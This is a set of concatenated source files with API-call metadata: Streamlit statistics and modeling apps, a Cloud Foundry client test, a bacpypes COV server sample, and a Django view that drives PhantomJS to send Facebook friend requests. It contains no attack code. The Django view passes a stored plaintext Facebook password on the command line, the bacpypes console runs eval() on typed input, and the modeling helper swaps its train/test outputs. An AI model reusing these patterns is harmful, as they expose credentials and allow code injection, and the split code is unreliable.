            st.write(str(100*cl) + "% confidence interval is (" + str(lower) + ", " + str(upper) + ")")
if prop_choice == "Two Proportions":
c1,c2,c3 = st.columns(3)
with c1:
x1 = int(st.text_input("Hits 1",20))
n1 = int(st.text_input("Tries 1",25))
with c2:
x2 = int(st.text_input("Hits 2",30))
n2 = int(st.text_input("Tries 2",50))
with c3:
alpha = float(st.text_input("Alpha",.05))
st.markdown("Pick a test:")
tail_choice = st.radio("",["Left Tail","Two Tails","Right Tail"])
one = st.columns(1)
with one[0]:
p_hat1 = x1/n1
q_hat1 = 1 -p_hat1
p_hat2 = x2/n2
q_hat2 = 1 - p_hat2
pp_hat = (x1+x2)/(n1+n2)
dp_hat = p_hat1 - p_hat2
pq_hat = 1-pp_hat
tsd = math.sqrt(pp_hat*pq_hat*(1/n1+1/n2))
cise = math.sqrt(p_hat1*q_hat1/n1+p_hat2*q_hat2/n2)
z = (p_hat1 - p_hat2)/tsd
x = np.arange(-4,4,.1)
y = norm.pdf(x)
ndf = pd.DataFrame({"x":x,"y":y})
normp = ggplot(ndf) + coord_fixed(ratio = 4)
if tail_choice == "Left Tail":
pv = norm.cdf(z)
cz = norm.ppf(alpha)
rcz = cz
cl = 1 - 2*alpha
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "steelblue", xlim = (-4,z))
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "orange", xlim = (-4,cz))
if tail_choice == "Two Tails":
pv = 2*(1-norm.cdf(abs(z)))
cz = abs(norm.ppf(alpha/2))
rcz = "±" + str(abs(norm.ppf(alpha/2)))
cl = 1 - alpha
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "steelblue", xlim = (-4,-1*abs(z)))
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "steelblue", xlim = (abs(z),4))
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "orange", xlim = (-4,-1*abs(cz)))
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "orange", xlim = (abs(cz),4))
if tail_choice == "Right Tail":
pv = 1 - norm.cdf(z)
cz = -1 * norm.ppf(alpha)
rcz = cz
cl = 1 - 2*alpha
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "steelblue", xlim = (z,4))
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "orange", xlim = (cz,4))
me = cz * cise
rme = "±" + str(abs(me))
data = pd.DataFrame({"p-Hat 1":p_hat1,"p-Hat 2":p_hat2,"Pooled p-Hat":pp_hat,"Diff p-Hat":dp_hat,"z-Score":z,"p-Value":pv,"CV":rcz,"Test SD":tsd,"C-Level":cl,"CI SE":cise,"ME":rme},index = [0])
st.write(data)
normp = normp + geom_segment(aes(x = z, y = 0, xend = z, yend = norm.pdf(z)),color="red")
normp = normp + geom_line(aes(x=x,y=y))
st.pyplot(ggplot.draw(normp))
lower = dp_hat - abs(me)
upper = dp_hat + abs(me)
            st.write(str(100*cl) + "% confidence interval is (" + str(lower) + ", " + str(upper) + ")")
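# ---------------------------------------------------------------------------
# Minimal sanity-check sketch (not part of the Streamlit app): recomputes the
# one-proportion z statistic and two-tailed p-value for the default inputs
# used above (x=20, n=25, null p=0.7) with scipy/math only.
# ---------------------------------------------------------------------------
if __name__ == "__main__":
    x, n, nullp = 20, 25, 0.7
    p_hat = x / n
    z = (p_hat - nullp) / math.sqrt(nullp * (1 - nullp) / n)
    p_value = 2 * (1 - norm.cdf(abs(z)))
    print("p_hat=%.3f z=%.3f two-tailed p=%.4f" % (p_hat, z, p_value))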
| [((10, 4, 10, 31), 'streamlit.subheader', 'st.subheader', ({(10, 17, 10, 30): '"""Proportions"""'}, {}), "('Proportions')", True, 'import streamlit as st\n'), ((11, 4, 11, 47), 'streamlit.sidebar.subheader', 'st.sidebar.subheader', ({(11, 25, 11, 46): '"""Proportion Settings"""'}, {}), "('Proportion Settings')", True, 'import streamlit as st\n'), ((12, 18, 12, 75), 'streamlit.sidebar.radio', 'st.sidebar.radio', ({(12, 35, 12, 37): '""""""', (12, 38, 12, 74): "['One Proportion', 'Two Proportions']"}, {}), "('', ['One Proportion', 'Two Proportions'])", True, 'import streamlit as st\n'), ((15, 19, 15, 32), 'streamlit.columns', 'st.columns', ({(15, 30, 15, 31): '3'}, {}), '(3)', True, 'import streamlit as st\n'), ((26, 14, 26, 27), 'streamlit.columns', 'st.columns', ({(26, 25, 26, 26): '1'}, {}), '(1)', True, 'import streamlit as st\n'), ((71, 19, 71, 32), 'streamlit.columns', 'st.columns', ({(71, 30, 71, 31): '3'}, {}), '(3)', True, 'import streamlit as st\n'), ((84, 14, 84, 27), 'streamlit.columns', 'st.columns', ({(84, 25, 84, 26): '1'}, {}), '(1)', True, 'import streamlit as st\n'), ((23, 12, 23, 39), 'streamlit.markdown', 'st.markdown', ({(23, 24, 23, 38): '"""Pick a test:"""'}, {}), "('Pick a test:')", True, 'import streamlit as st\n'), ((24, 26, 24, 77), 'streamlit.radio', 'st.radio', ({(24, 35, 24, 37): '""""""', (24, 38, 24, 76): "['Left Tail', 'Two Tails', 'Right Tail']"}, {}), "('', ['Left Tail', 'Two Tails', 'Right Tail'])", True, 'import streamlit as st\n'), ((29, 18, 29, 46), 'math.sqrt', 'math.sqrt', ({(29, 28, 29, 45): 'nullp * (1 - nullp) / n'}, {}), '(nullp * (1 - nullp) / n)', False, 'import math\n'), ((30, 19, 30, 47), 'math.sqrt', 'math.sqrt', ({(30, 29, 30, 46): 'p_hat * (1 - p_hat) / n'}, {}), '(p_hat * (1 - p_hat) / n)', False, 'import math\n'), ((32, 16, 32, 34), 'numpy.arange', 'np.arange', ({(32, 26, 32, 28): '-4', (32, 29, 32, 30): '4', (32, 31, 32, 33): '0.1'}, {}), '(-4, 4, 0.1)', True, 'import numpy as np\n'), ((34, 18, 34, 45), 'pandas.DataFrame', 'pd.DataFrame', ({(34, 31, 34, 44): "{'x': x, 'y': y}"}, {}), "({'x': x, 'y': y})", True, 'import pandas as pd\n'), ((61, 19, 61, 143), 'pandas.DataFrame', 'pd.DataFrame', (), '', True, 'import pandas as pd\n'), ((62, 12, 62, 26), 'streamlit.write', 'st.write', ({(62, 21, 62, 25): 'data'}, {}), '(data)', True, 'import streamlit as st\n'), ((81, 12, 81, 39), 'streamlit.markdown', 'st.markdown', ({(81, 24, 81, 38): '"""Pick a test:"""'}, {}), "('Pick a test:')", True, 'import streamlit as st\n'), ((82, 26, 82, 77), 'streamlit.radio', 'st.radio', ({(82, 35, 82, 37): '""""""', (82, 38, 82, 76): "['Left Tail', 'Two Tails', 'Right Tail']"}, {}), "('', ['Left Tail', 'Two Tails', 'Right Tail'])", True, 'import streamlit as st\n'), ((93, 18, 93, 54), 'math.sqrt', 'math.sqrt', ({(93, 28, 93, 53): 'pp_hat * pq_hat * (1 / n1 + 1 / n2)'}, {}), '(pp_hat * pq_hat * (1 / n1 + 1 / n2))', False, 'import math\n'), ((94, 19, 94, 63), 'math.sqrt', 'math.sqrt', ({(94, 29, 94, 62): 'p_hat1 * q_hat1 / n1 + p_hat2 * q_hat2 / n2'}, {}), '(p_hat1 * q_hat1 / n1 + p_hat2 * q_hat2 / n2)', False, 'import math\n'), ((97, 16, 97, 34), 'numpy.arange', 'np.arange', ({(97, 26, 97, 28): '-4', (97, 29, 97, 30): '4', (97, 31, 97, 33): '0.1'}, {}), '(-4, 4, 0.1)', True, 'import numpy as np\n'), ((99, 18, 99, 45), 'pandas.DataFrame', 'pd.DataFrame', ({(99, 31, 99, 44): "{'x': x, 'y': y}"}, {}), "({'x': x, 'y': y})", True, 'import pandas as pd\n'), ((127, 19, 127, 205), 'pandas.DataFrame', 'pd.DataFrame', (), '', True, 'import pandas as pd\n'), ((128, 12, 
128, 26), 'streamlit.write', 'st.write', ({(128, 21, 128, 25): 'data'}, {}), '(data)', True, 'import streamlit as st\n'), ((17, 20, 17, 44), 'streamlit.text_input', 'st.text_input', ({(17, 34, 17, 40): '"""Hits"""', (17, 41, 17, 43): '20'}, {}), "('Hits', 20)", True, 'import streamlit as st\n'), ((18, 20, 18, 45), 'streamlit.text_input', 'st.text_input', ({(18, 34, 18, 41): '"""Tries"""', (18, 42, 18, 44): '25'}, {}), "('Tries', 25)", True, 'import streamlit as st\n'), ((20, 26, 20, 51), 'streamlit.text_input', 'st.text_input', ({(20, 40, 20, 47): '"""Null:"""', (20, 48, 20, 50): '0.7'}, {}), "('Null:', 0.7)", True, 'import streamlit as st\n'), ((21, 26, 21, 52), 'streamlit.text_input', 'st.text_input', ({(21, 40, 21, 47): '"""Alpha"""', (21, 48, 21, 51): '0.05'}, {}), "('Alpha', 0.05)", True, 'import streamlit as st\n'), ((73, 21, 73, 47), 'streamlit.text_input', 'st.text_input', ({(73, 35, 73, 43): '"""Hits 1"""', (73, 44, 73, 46): '20'}, {}), "('Hits 1', 20)", True, 'import streamlit as st\n'), ((74, 21, 74, 48), 'streamlit.text_input', 'st.text_input', ({(74, 35, 74, 44): '"""Tries 1"""', (74, 45, 74, 47): '25'}, {}), "('Tries 1', 25)", True, 'import streamlit as st\n'), ((77, 21, 77, 47), 'streamlit.text_input', 'st.text_input', ({(77, 35, 77, 43): '"""Hits 2"""', (77, 44, 77, 46): '30'}, {}), "('Hits 2', 30)", True, 'import streamlit as st\n'), ((78, 21, 78, 48), 'streamlit.text_input', 'st.text_input', ({(78, 35, 78, 44): '"""Tries 2"""', (78, 45, 78, 47): '50'}, {}), "('Tries 2', 50)", True, 'import streamlit as st\n'), ((80, 26, 80, 52), 'streamlit.text_input', 'st.text_input', ({(80, 40, 80, 47): '"""Alpha"""', (80, 48, 80, 51): '0.05'}, {}), "('Alpha', 0.05)", True, 'import streamlit as st\n')] |
subhash12/cf-python-client | integration/v2/test_service_instances.py | c0ecbb8ec85040fc2f74b6c52e1f9a6c6c16c4b0 | import logging
import unittest
from config_test import build_client_from_configuration
_logger = logging.getLogger(__name__)
class TestServiceInstances(unittest.TestCase):
def test_create_update_delete(self):
client = build_client_from_configuration()
result = client.v2.service_instances.create(client.space_guid, "test_name", client.plan_guid, client.creation_parameters)
if len(client.update_parameters) > 0:
client.v2.service_instances.update(result["metadata"]["guid"], client.update_parameters)
else:
_logger.warning("update test skipped")
client.v2.service_instances.remove(result["metadata"]["guid"])
def test_get(self):
client = build_client_from_configuration()
cpt = 0
for instance in client.v2.service_instances.list():
if cpt == 0:
self.assertIsNotNone(client.v2.service_instances.get_first(space_guid=instance["entity"]["space_guid"]))
self.assertIsNotNone(client.v2.service_instances.get(instance["metadata"]["guid"]))
self.assertIsNotNone(client.v2.service_instances.list_permissions(instance["metadata"]["guid"]))
cpt += 1
_logger.debug("test_get - %d found", cpt)
| [((6, 10, 6, 37), 'logging.getLogger', 'logging.getLogger', ({(6, 28, 6, 36): '__name__'}, {}), '(__name__)', False, 'import logging\n'), ((11, 17, 11, 50), 'config_test.build_client_from_configuration', 'build_client_from_configuration', ({}, {}), '()', False, 'from config_test import build_client_from_configuration\n'), ((20, 17, 20, 50), 'config_test.build_client_from_configuration', 'build_client_from_configuration', ({}, {}), '()', False, 'from config_test import build_client_from_configuration\n')] |
troyready/runway | runway/core/providers/__init__.py | 4fd299961a4b73df39e14f4f19a7236f7be17dd8 | """Runway providers."""
| [] |
noelli/bacpypes | samples/COVServer.py | c2f4d753ed86bc0357823e718e7ff16c05f06850 | #!/usr/bin/env python
"""
This sample application is a server that supports COV notification services.
The console accepts commands that change the properties of an object that
triggers the notifications.
"""
import time
from threading import Thread
from bacpypes.debugging import bacpypes_debugging, ModuleLogger
from bacpypes.consolelogging import ConfigArgumentParser
from bacpypes.consolecmd import ConsoleCmd
from bacpypes.core import run, deferred, enable_sleeping
from bacpypes.task import RecurringTask
from bacpypes.app import BIPSimpleApplication
from bacpypes.object import AnalogValueObject, BinaryValueObject
from bacpypes.local.device import LocalDeviceObject
from bacpypes.service.cov import ChangeOfValueServices
# some debugging
_debug = 0
_log = ModuleLogger(globals())
# test globals
test_av = None
test_bv = None
test_application = None
#
# SubscribeCOVApplication
#
@bacpypes_debugging
class SubscribeCOVApplication(BIPSimpleApplication, ChangeOfValueServices):
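    # BIPSimpleApplication provides the ordinary BACnet/IP application stack;
    # the ChangeOfValueServices mixin adds the COV subscription machinery
    # (including the cov_detections map used by the console commands below),
    # so nothing else is needed in this class.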
pass
#
# COVConsoleCmd
#
@bacpypes_debugging
class COVConsoleCmd(ConsoleCmd):
def do_status(self, args):
"""status"""
args = args.split()
if _debug: COVConsoleCmd._debug("do_status %r", args)
global test_application
# dump from the COV detections dict
for obj_ref, cov_detection in test_application.cov_detections.items():
print("{} {}".format(obj_ref.objectIdentifier, obj_ref))
for cov_subscription in cov_detection.cov_subscriptions:
print(" {} proc_id={} confirmed={} lifetime={}".format(
cov_subscription.client_addr,
cov_subscription.proc_id,
cov_subscription.confirmed,
cov_subscription.lifetime,
))
def do_trigger(self, args):
"""trigger object_name"""
args = args.split()
if _debug: COVConsoleCmd._debug("do_trigger %r", args)
global test_application
if not args:
print("object name required")
return
obj = test_application.get_object_name(args[0])
if not obj:
print("no such object")
return
# get the detection algorithm object
cov_detection = test_application.cov_detections.get(obj, None)
if (not cov_detection) or (len(cov_detection.cov_subscriptions) == 0):
print("no subscriptions for that object")
return
# tell it to send out notifications
cov_detection.send_cov_notifications()
def do_set(self, args):
"""set object_name [ . ] property_name [ = ] value"""
args = args.split()
if _debug: COVConsoleCmd._debug("do_set %r", args)
global test_application
try:
object_name = args.pop(0)
if '.' in object_name:
object_name, property_name = object_name.split('.')
else:
property_name = args.pop(0)
if _debug: COVConsoleCmd._debug(" - object_name: %r", object_name)
if _debug: COVConsoleCmd._debug(" - property_name: %r", property_name)
obj = test_application.get_object_name(object_name)
if _debug: COVConsoleCmd._debug(" - obj: %r", obj)
if not obj:
raise RuntimeError("object not found: %r" % (object_name,))
datatype = obj.get_datatype(property_name)
if _debug: COVConsoleCmd._debug(" - datatype: %r", datatype)
if not datatype:
raise RuntimeError("not a property: %r" % (property_name,))
# toss the equals
if args[0] == '=':
args.pop(0)
# evaluate the value
value = eval(args.pop(0))
if _debug: COVConsoleCmd._debug(" - raw value: %r", value)
# see if it can be built
obj_value = datatype(value)
if _debug: COVConsoleCmd._debug(" - obj_value: %r", obj_value)
# normalize
value = obj_value.value
if _debug: COVConsoleCmd._debug(" - normalized value: %r", value)
# change the value
setattr(obj, property_name, value)
except IndexError:
print(COVConsoleCmd.do_set.__doc__)
except Exception as err:
print("exception: %s" % (err,))
def do_write(self, args):
"""write object_name [ . ] property [ = ] value"""
args = args.split()
if _debug: COVConsoleCmd._debug("do_set %r", args)
global test_application
try:
object_name = args.pop(0)
if '.' in object_name:
object_name, property_name = object_name.split('.')
else:
property_name = args.pop(0)
if _debug: COVConsoleCmd._debug(" - object_name: %r", object_name)
if _debug: COVConsoleCmd._debug(" - property_name: %r", property_name)
obj = test_application.get_object_name(object_name)
if _debug: COVConsoleCmd._debug(" - obj: %r", obj)
if not obj:
raise RuntimeError("object not found: %r" % (object_name,))
datatype = obj.get_datatype(property_name)
if _debug: COVConsoleCmd._debug(" - datatype: %r", datatype)
if not datatype:
raise RuntimeError("not a property: %r" % (property_name,))
# toss the equals
if args[0] == '=':
args.pop(0)
# evaluate the value
value = eval(args.pop(0))
if _debug: COVConsoleCmd._debug(" - raw value: %r", value)
# see if it can be built
obj_value = datatype(value)
if _debug: COVConsoleCmd._debug(" - obj_value: %r", obj_value)
# normalize
value = obj_value.value
if _debug: COVConsoleCmd._debug(" - normalized value: %r", value)
# pass it along
obj.WriteProperty(property_name, value)
except IndexError:
print(COVConsoleCmd.do_write.__doc__)
except Exception as err:
print("exception: %s" % (err,))
@bacpypes_debugging
class TestAnalogValueTask(RecurringTask):
"""
An instance of this class is created when '--avtask <interval>' is
specified as a command line argument. Every <interval> seconds it
changes the value of the test_av present value.
"""
def __init__(self, interval):
if _debug: TestAnalogValueTask._debug("__init__ %r", interval)
RecurringTask.__init__(self, interval * 1000)
# make a list of test values
self.test_values = list(float(i * 10) for i in range(10))
def process_task(self):
if _debug: TestAnalogValueTask._debug("process_task")
global test_av
# pop the next value
next_value = self.test_values.pop(0)
self.test_values.append(next_value)
if _debug: TestAnalogValueTask._debug(" - next_value: %r", next_value)
# change the point
test_av.presentValue = next_value
@bacpypes_debugging
class TestAnalogValueThread(Thread):
"""
An instance of this class is created when '--avthread <interval>' is
specified as a command line argument. Every <interval> seconds it
changes the value of the test_av present value.
"""
def __init__(self, interval):
if _debug: TestAnalogValueThread._debug("__init__ %r", interval)
Thread.__init__(self)
# runs as a daemon
self.daemon = True
# save the interval
self.interval = interval
# make a list of test values
self.test_values = list(100.0 + float(i * 10) for i in range(10))
def run(self):
if _debug: TestAnalogValueThread._debug("run")
global test_av
while True:
# pop the next value
next_value = self.test_values.pop(0)
self.test_values.append(next_value)
if _debug: TestAnalogValueThread._debug(" - next_value: %r", next_value)
# change the point
test_av.presentValue = next_value
# sleep
time.sleep(self.interval)
@bacpypes_debugging
class TestBinaryValueTask(RecurringTask):
"""
An instance of this class is created when '--bvtask <interval>' is
specified as a command line argument. Every <interval> seconds it
changes the value of the test_bv present value.
"""
def __init__(self, interval):
if _debug: TestBinaryValueTask._debug("__init__ %r", interval)
RecurringTask.__init__(self, interval * 1000)
# save the interval
self.interval = interval
# make a list of test values
self.test_values = [True, False]
def process_task(self):
if _debug: TestBinaryValueTask._debug("process_task")
global test_bv
# pop the next value
next_value = self.test_values.pop(0)
self.test_values.append(next_value)
if _debug: TestBinaryValueTask._debug(" - next_value: %r", next_value)
# change the point
test_bv.presentValue = next_value
@bacpypes_debugging
class TestBinaryValueThread(RecurringTask, Thread):
"""
An instance of this class is created when '--bvthread <interval>' is
specified as a command line argument. Every <interval> seconds it
changes the value of the test_bv present value.
"""
def __init__(self, interval):
if _debug: TestBinaryValueThread._debug("__init__ %r", interval)
Thread.__init__(self)
# runs as a daemon
self.daemon = True
# save the interval
self.interval = interval
# make a list of test values
self.test_values = [True, False]
def run(self):
if _debug: TestBinaryValueThread._debug("run")
global test_bv
while True:
# pop the next value
next_value = self.test_values.pop(0)
self.test_values.append(next_value)
if _debug: TestBinaryValueThread._debug(" - next_value: %r", next_value)
# change the point
test_bv.presentValue = next_value
# sleep
time.sleep(self.interval)
def main():
global test_av, test_bv, test_application
# make a parser
parser = ConfigArgumentParser(description=__doc__)
parser.add_argument("--console",
action="store_true",
default=False,
help="create a console",
)
# analog value task and thread
parser.add_argument("--avtask", type=float,
help="analog value recurring task",
)
parser.add_argument("--avthread", type=float,
help="analog value thread",
)
# analog value task and thread
parser.add_argument("--bvtask", type=float,
help="binary value recurring task",
)
parser.add_argument("--bvthread", type=float,
help="binary value thread",
)
# provide a different spin value
parser.add_argument("--spin", type=float,
help="spin time",
default=1.0,
)
# parse the command line arguments
args = parser.parse_args()
if _debug: _log.debug("initialization")
if _debug: _log.debug(" - args: %r", args)
# make a device object
this_device = LocalDeviceObject(ini=args.ini)
if _debug: _log.debug(" - this_device: %r", this_device)
# make a sample application
test_application = SubscribeCOVApplication(this_device, args.ini.address)
# make an analog value object
test_av = AnalogValueObject(
objectIdentifier=('analogValue', 1),
objectName='av',
presentValue=0.0,
statusFlags=[0, 0, 0, 0],
covIncrement=1.0,
)
_log.debug(" - test_av: %r", test_av)
# add it to the device
test_application.add_object(test_av)
_log.debug(" - object list: %r", this_device.objectList)
# make a binary value object
test_bv = BinaryValueObject(
objectIdentifier=('binaryValue', 1),
objectName='bv',
presentValue='inactive',
statusFlags=[0, 0, 0, 0],
)
_log.debug(" - test_bv: %r", test_bv)
# add it to the device
test_application.add_object(test_bv)
# make a console
if args.console:
test_console = COVConsoleCmd()
_log.debug(" - test_console: %r", test_console)
# enable sleeping will help with threads
enable_sleeping()
# analog value task
if args.avtask:
test_av_task = TestAnalogValueTask(args.avtask)
test_av_task.install_task()
# analog value thread
if args.avthread:
test_av_thread = TestAnalogValueThread(args.avthread)
deferred(test_av_thread.start)
# binary value task
if args.bvtask:
test_bv_task = TestBinaryValueTask(args.bvtask)
test_bv_task.install_task()
# binary value thread
if args.bvthread:
test_bv_thread = TestBinaryValueThread(args.bvthread)
deferred(test_bv_thread.start)
_log.debug("running")
run(args.spin)
_log.debug("fini")
if __name__ == "__main__":
main()
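# ---------------------------------------------------------------------------
# Example invocation (a sketch; the INI file name and interval value are
# illustrative, not part of the sample):
#
#   python COVServer.py --ini BACpypes.ini --console --avtask 10
#
# and then, at the console prompt:
#
#   > status                      list current COV subscriptions
#   > set av presentValue 42.0    change the analog value object
#   > trigger av                  force notifications for 'av'
# ---------------------------------------------------------------------------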
| [((332, 13, 332, 54), 'bacpypes.consolelogging.ConfigArgumentParser', 'ConfigArgumentParser', (), '', False, 'from bacpypes.consolelogging import ConfigArgumentParser\n'), ((368, 18, 368, 49), 'bacpypes.local.device.LocalDeviceObject', 'LocalDeviceObject', (), '', False, 'from bacpypes.local.device import LocalDeviceObject\n'), ((375, 14, 381, 9), 'bacpypes.object.AnalogValueObject', 'AnalogValueObject', (), '', False, 'from bacpypes.object import AnalogValueObject, BinaryValueObject\n'), ((389, 14, 394, 9), 'bacpypes.object.BinaryValueObject', 'BinaryValueObject', (), '', False, 'from bacpypes.object import AnalogValueObject, BinaryValueObject\n'), ((430, 4, 430, 18), 'bacpypes.core.run', 'run', ({(430, 8, 430, 17): 'args.spin'}, {}), '(args.spin)', False, 'from bacpypes.core import run, deferred, enable_sleeping\n'), ((200, 8, 200, 53), 'bacpypes.task.RecurringTask.__init__', 'RecurringTask.__init__', ({(200, 31, 200, 35): 'self', (200, 37, 200, 52): '(interval * 1000)'}, {}), '(self, interval * 1000)', False, 'from bacpypes.task import RecurringTask\n'), ((229, 8, 229, 29), 'threading.Thread.__init__', 'Thread.__init__', ({(229, 24, 229, 28): 'self'}, {}), '(self)', False, 'from threading import Thread\n'), ((268, 8, 268, 53), 'bacpypes.task.RecurringTask.__init__', 'RecurringTask.__init__', ({(268, 31, 268, 35): 'self', (268, 37, 268, 52): '(interval * 1000)'}, {}), '(self, interval * 1000)', False, 'from bacpypes.task import RecurringTask\n'), ((300, 8, 300, 29), 'threading.Thread.__init__', 'Thread.__init__', ({(300, 24, 300, 28): 'self'}, {}), '(self)', False, 'from threading import Thread\n'), ((406, 8, 406, 25), 'bacpypes.core.enable_sleeping', 'enable_sleeping', ({}, {}), '()', False, 'from bacpypes.core import run, deferred, enable_sleeping\n'), ((416, 8, 416, 38), 'bacpypes.core.deferred', 'deferred', ({(416, 17, 416, 37): 'test_av_thread.start'}, {}), '(test_av_thread.start)', False, 'from bacpypes.core import run, deferred, enable_sleeping\n'), ((426, 8, 426, 38), 'bacpypes.core.deferred', 'deferred', ({(426, 17, 426, 37): 'test_bv_thread.start'}, {}), '(test_bv_thread.start)', False, 'from bacpypes.core import run, deferred, enable_sleeping\n'), ((254, 12, 254, 37), 'time.sleep', 'time.sleep', ({(254, 23, 254, 36): 'self.interval'}, {}), '(self.interval)', False, 'import time\n'), ((325, 12, 325, 37), 'time.sleep', 'time.sleep', ({(325, 23, 325, 36): 'self.interval'}, {}), '(self.interval)', False, 'import time\n')] |
theopak/glassface | server/glassface/facebookfriender/views.py | bcb6c02636bda069d604a4da1dd09222e99be356 | import os
import platform
import subprocess
from django.http import HttpResponse
from django.conf import settings
def add(request, friend):
phantomjs = os.path.join(settings.PROJECT_PATH, 'glassface', 'facebookfriender', platform.system(), 'phantomjs')
script = os.path.join(settings.PROJECT_PATH, 'glassface', 'facebookfriender', 'facebookfriender.js')
try:
subprocess.call([phantomjs, script, friend, request.user.get_profile().facebook_email, request.user.get_profile().facebook_pass])
except:
return False
return True
def extract(request):
phantomjs = os.path.join(settings.PROJECT_PATH, 'glassface', 'facebookfriender', platform.system(), 'phantomjs')
script = os.path.join(settings.PROJECT_PATH, 'glassface', 'facebookfriender', 'useridextractor.js')
print "sexy"
out = subprocess.check_output([phantomjs, script, request.POST['email'], request.POST['password']])
print out
return "user id goes here"
| [] |
rubyruins/fancylit | fancylit/modeling/yellowbrick_funcs.py | 56a7cdfe78edd687a3b318bbbfa534203de1ace8 | import random
import numpy as np
import pandas as pd
import streamlit as st
from sklearn.naive_bayes import GaussianNB
from sklearn.model_selection import train_test_split
from yellowbrick.classifier import classification_report
from yellowbrick.target import FeatureCorrelation
from yellowbrick.target import ClassBalance
from streamlit_yellowbrick import st_yellowbrick
from typing import Any, List, Tuple
import plotly.express as px
def data_prep(df: pd.DataFrame) -> Tuple[List, List, List, List]:
"""
Purpose:
Prep data for modeling
Args:
df - Pandas dataframe
Returns:
test_features - test set features
        train_features - train set features
test_target - test set target
train_target - train set target
"""
# Specify the target classes
target_string = st.selectbox("Select Target Column", df.columns)
target = np.array(df[target_string])
# Select Features you want
feature_cols = st.multiselect("Select Modeling Features", df.columns)
# Get all features
features = df[feature_cols]
featurestmp = np.array(features)
feats = []
    # convert each row's features to float; report and stop the app on rows that cannot be converted
for index, featarr in enumerate(featurestmp):
try:
featarr = featarr.astype(float)
feats.append(featarr)
except Exception as error:
st.error(error)
st.error(featarr)
st.stop()
featuresarr = np.array(feats)
# Split Data
randInt = random.randint(1, 200)
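    # NOTE: train_test_split returns (train, test) pairs, so with
    # test_size=0.75 the smaller (25%) split is bound to test_features and the
    # larger (75%) split to train_features, i.e. 75% of rows go to training.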
(
test_features,
train_features,
test_target,
train_target,
) = train_test_split(featuresarr, target, test_size=0.75, random_state=randInt)
return (
test_features,
train_features,
test_target,
train_target,
)
def show_classification_report(
df: pd.DataFrame,
) -> None:
"""
Purpose:
Renders a classification_report
Args:
df - Pandas dataframe
Returns:
N/A
"""
# Prep data for model training
(
test_features,
train_features,
test_target,
train_target,
) = data_prep(df)
if st.button("Train Model"):
st.header("Classification Report")
st.markdown(
"The classification report visualizer displays the precision, recall, F1, and support scores for the model. In order to support easier interpretation and problem detection, the report integrates numerical scores with a color-coded heatmap. All heatmaps are in the range (0.0, 1.0) to facilitate easy comparison of classification models across different classification reports."
)
# Instantiate the visualizer
visualizer = classification_report(
GaussianNB(),
train_features,
train_target,
test_features,
test_target,
support=True,
)
# Get the viz
fig = visualizer.fig
ax = visualizer.show()
fig.axes.append(ax)
# show the viz
st.write(fig)
# TODO download model, Download report
# TODO live predictions
def feature_correlation(df: pd.DataFrame) -> None:
"""
Purpose:
Renders a feature correlation graph
Args:
df - Pandas dataframe
Returns:
N/A
"""
target_string = st.selectbox("Select Target Column", df.columns,
key="selectbox-feature-correlation")
residual_cols = [col for col in df.columns if col != target_string and df[col].dtype != "object"]
feature_cols = st.multiselect("Select Modeling Features", residual_cols,
key="multiselect-feature-correlation",
default=residual_cols[:5])
if str(df[target_string].dtype) == "object":
method = 'mutual_info-classification'
else:
type_problem = st.selectbox("Select the type of problem",
['classification', 'regression'])
if type_problem == 'classification':
method = st.selectbox("Select the correlation method",
['mutual_info-classification', 'pearson'])
else:
method = st.selectbox("Select the correlation method",
['mutual_info-regression', 'pearson'])
try:
viz = FeatureCorrelation(method=method,
feature_names=feature_cols,
sort=True)
viz.fit(df[feature_cols], df[target_string])
fig = px.bar(x=viz.scores_, y=viz.features_, title="Feature Correlation")
st.plotly_chart(fig)
except :
st.warning("Verify the type of problem that you select")
def class_balance(df: pd.DataFrame) -> None:
"""
Purpose:
Renders a class balance graph
Args:
df - Pandas dataframe
Returns:
N/A
"""
classes = st.selectbox("Select Class Column", df.columns, index = len(df.columns) - 1)
visualizer = ClassBalance(labels = df[classes].unique())
visualizer.fit(df[classes])
st_yellowbrick(visualizer) | [((28, 20, 28, 68), 'streamlit.selectbox', 'st.selectbox', ({(28, 33, 28, 55): '"""Select Target Column"""', (28, 57, 28, 67): 'df.columns'}, {}), "('Select Target Column', df.columns)", True, 'import streamlit as st\n'), ((29, 13, 29, 40), 'numpy.array', 'np.array', ({(29, 22, 29, 39): 'df[target_string]'}, {}), '(df[target_string])', True, 'import numpy as np\n'), ((32, 19, 32, 73), 'streamlit.multiselect', 'st.multiselect', ({(32, 34, 32, 60): '"""Select Modeling Features"""', (32, 62, 32, 72): 'df.columns'}, {}), "('Select Modeling Features', df.columns)", True, 'import streamlit as st\n'), ((36, 18, 36, 36), 'numpy.array', 'np.array', ({(36, 27, 36, 35): 'features'}, {}), '(features)', True, 'import numpy as np\n'), ((49, 18, 49, 33), 'numpy.array', 'np.array', ({(49, 27, 49, 32): 'feats'}, {}), '(feats)', True, 'import numpy as np\n'), ((52, 14, 52, 36), 'random.randint', 'random.randint', ({(52, 29, 52, 30): '1', (52, 32, 52, 35): '200'}, {}), '(1, 200)', False, 'import random\n'), ((59, 8, 59, 83), 'sklearn.model_selection.train_test_split', 'train_test_split', (), '', False, 'from sklearn.model_selection import train_test_split\n'), ((89, 7, 89, 31), 'streamlit.button', 'st.button', ({(89, 17, 89, 30): '"""Train Model"""'}, {}), "('Train Model')", True, 'import streamlit as st\n'), ((127, 20, 128, 69), 'streamlit.selectbox', 'st.selectbox', (), '', True, 'import streamlit as st\n'), ((130, 19, 132, 60), 'streamlit.multiselect', 'st.multiselect', (), '', True, 'import streamlit as st\n'), ((170, 4, 170, 30), 'streamlit_yellowbrick.st_yellowbrick', 'st_yellowbrick', ({(170, 19, 170, 29): 'visualizer'}, {}), '(visualizer)', False, 'from streamlit_yellowbrick import st_yellowbrick\n'), ((91, 8, 91, 42), 'streamlit.header', 'st.header', ({(91, 18, 91, 41): '"""Classification Report"""'}, {}), "('Classification Report')", True, 'import streamlit as st\n'), ((93, 8, 95, 9), 'streamlit.markdown', 'st.markdown', ({(94, 12, 94, 389): '"""The classification report visualizer displays the precision, recall, F1, and support scores for the model. In order to support easier interpretation and problem detection, the report integrates numerical scores with a color-coded heatmap. All heatmaps are in the range (0.0, 1.0) to facilitate easy comparison of classification models across 